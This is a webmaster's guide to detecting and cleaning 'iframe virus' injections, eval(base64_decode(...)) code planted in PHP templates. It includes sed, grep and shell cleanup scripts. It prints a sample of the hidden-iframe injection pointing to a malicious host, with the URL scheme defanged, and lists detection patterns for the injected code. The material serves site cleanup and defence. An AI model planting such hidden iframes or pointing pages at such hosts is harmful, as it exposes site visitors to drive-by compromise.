Removing the Iframe Virus from your Web Pages

What is an Iframe Virus?

An Iframe virus is a malicious piece of code added to a web page which links to a foreign website. The iframe is sized in such a way that the user of the web page does not see the foreign website on his screen. The foreign website often has the ability to compromise the user's computer.

How do you get an Iframe Virus?

Someone must be able to write to your website in order to infect your code. Typically this happens when someone obtains the FTP passwords, user names, and URLs of the websites you update. This information is often harvested by viruses on your local computer. The virus sends the passwords and other information back to another computer, which then plants the iframe virus.

How will you know you have an Iframe Virus?

Often Google or Microsoft will detect these viruses for you. Blacklists of URLs exist, and browsers check whether a site is on a blacklist. Since the iframe often refers to a blacklisted site, the user's browser will not allow access to your site. Instead your users will get a nasty message saying that the site they are trying to access has been blacklisted. Often the signs are more subtle, with behavior on some pages being a little different. A photo may stop appearing or some text may be missing.

You confirm the virus by looking at your web pages. Viewing the page source in your browser (on your computer, not on the web server) will show source code that looks like this:

 <iframe height="125" width="125" style="visibility: hidden;"
src="/htxxxtp://a5j.ru:8080/ts/in.cgi?pepsi100"/>

In the real code the htxxxtp is an ordinary http, without the x's.

Viewing the HTML code on your computer will reveal your template's own <?php tags followed by long statements of the form eval(base64_decode("DQ...")); where the quoted string is a very long run of base64 text:

What has happened is that innocent PHP opening tags like this:

<?php

have been hijacked by these long eval statements. The eval statement decodes the long string that follows it into code which is not good for the people who come to your site. Typically it creates a small iframe, a window which opens another web page that will in turn try to compromise your visitors' computers.

You need to fix this right away.

Scripts that will help you with this:

Removing the virus:

find /public_html -type f -name "*.php" -exec sed -i 's/<?php\s*eval(base64_decode("DQ[^"]*"));/<?php/g' '{}' \;

There is a lot going on in this one statement. You may have to modify it for your own purposes so I'll try to explain it.

find /public_html -type f -name "*.php" -exec

This part selects the web pages you need to check for viruses. In my case, I was looking for web pages in the /public_html folder, with names ending in "php". This will also check recursively, that is, in folders below the public_html folder.

sed -i 's/<?php\s*eval(base64_decode("DQ[^"]*"));/<?php/g'

This part does the work.

Sed is a batch editing program that is part of Linux. The "s" in "s/" means substitute. The syntax works like this: if you had the sentence:

"The boy loves cars"

sed s/loves/hates/ would change it to:

"The boy hates cars".

<?php\s*eval(base64_decode("DQ[^"]*"));

This is a regular expression. You may have to change this.

Start with the string "<?php", then any amount of white space (\s*),

then the string 'eval(base64_decode("DQ', then:

[^"]* - matches any run of characters that are not a double quote, that is, everything up to the closing double quote (").

Finally, match the string "));" which is at the end of the iframe virus.

Replace all this with the string "<?php".

The "g" is part of the syntax of the sed statement (replace every match on the line, not just the first), and the '{}' \; is part of the shell syntax of find: '{}' stands for each file that find locates and \; marks the end of the -exec command.

You may have to modify the part with the "DQ" string and the match for the double quote at the end. Your iframe virus could have a different phrase. Naturally, you should back up your whole folder before running this.

Afterwards:

You should run this procedure periodically. You can put it in your cron file (crontab) and run it every hour or so. You may have to fool around with the grep statement to make it more or less sensitive to the virus.

#!/bin/sh
# search for index files in pl with eval on first line
# echo "this examines the pl directory for the eval virus"
ADMIN="admin@example.com"   # placeholder: put your own address here
HOUR=$(date +%H)
# echo "time is $HOUR"
EMAILMESSAGE="/tmp/emailmessage.txt"
# report files whose first line contains "eval"; adjust this grep to make the check more or less sensitive
grep -nr --include '*.php' eval /public_html | cut -c1-60 | grep :1: > "$EMAILMESSAGE"
if [ $? -eq 0 ]; then
    echo "found something" >> "$EMAILMESSAGE"
    echo "you have to go to work"
    /bin/mail -s "looks like a virus" "$ADMIN" < "$EMAILMESSAGE"
else
    if [ "$HOUR" -eq 13 ]; then
        echo "nothing to find" >> "$EMAILMESSAGE"
        echo "all is good"
        /bin/mail -s "everything looks okay" "$ADMIN" < "$EMAILMESSAGE"
    fi
fi
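As an added example (not a script from the original page), the following shell script combines the sed cleanup and the hourly grep check above: it lists the infected PHP files, copies each one aside before editing, keeps a decoded copy of the injected string for review, and then strips the injection. It matches any base64 string rather than only ones starting with "DQ", so a variant with a different phrase is caught too; the function names, the backup layout and the sample site built by make_sample_tree are this example's own, and it assumes GNU find, grep, sed and base64.

```shell
#!/bin/sh
# Added example, not code from the original page. Assumes GNU find/grep/sed/base64.
# Pattern: opening tag, optional white space, eval(base64_decode("<any base64>"));
# Broader than the page's "DQ" regex so a variant with a different phrase is caught too.
INJECT_RE='<\?php[[:space:]]*eval\(base64_decode\("[A-Za-z0-9+/=]+"\)\);'

# clean_php_tree ROOT BACKUPDIR: back up, record and strip the injection; prints files cleaned
clean_php_tree() {
    root=$1
    backup=$2
    mkdir -p "$backup"
    list=$(mktemp)
    # like the hourly check: list only files that contain the injection (-l), recursively
    find "$root" -type f -name '*.php' -exec grep -lE "$INJECT_RE" {} + > "$list" || true
    while IFS= read -r f; do
        cp "$f" "$backup/$(basename "$f").bak"    # back up before editing, as the page advises
        # keep the decoded payload for offline review; base64 -d only decodes, nothing is run
        grep -oE 'base64_decode\("[A-Za-z0-9+/=]+"\)' "$f" | sed -E 's/.*"([^"]*)".*/\1/' |
        while IFS= read -r b64; do
            printf '%s: ' "$f" >> "$backup/decoded_payloads.txt"
            printf '%s' "$b64" | base64 -d >> "$backup/decoded_payloads.txt" 2>/dev/null || true
            printf '\n' >> "$backup/decoded_payloads.txt"
        done
        # same substitution as the page's sed, with | as delimiter because the class holds a /
        sed -i -E "s|$INJECT_RE|<?php|g" "$f"
    done < "$list"
    n=$(wc -l < "$list" | tr -d ' ')
    rm -f "$list"
    echo "$n"
}

# make_sample_tree DIR: constructed site with one infected template and one clean file
make_sample_tree() {
    site=$1
    mkdir -p "$site/templates"
    b64=$(printf '%s' '/* constructed sample payload */' | base64)   # stands in for the real one
    printf '<?php  eval(base64_decode("%s")); echo $this->language ?>\n' "$b64" \
        > "$site/templates/index.php"
    printf '<?php echo "clean file"; ?>\n' > "$site/clean.php"
}

# usage: build the sample site in a temp dir, clean it, show what was done
if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp -d)
    make_sample_tree "$tmp/site"
    echo "cleaned $(clean_php_tree "$tmp/site" "$tmp/backup") file(s); see $tmp/backup"
fi
```

Run it with --demo to see the sample cleaned; point clean_php_tree at your own web root only after checking the entries in decoded_payloads.txt to confirm what was matched.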
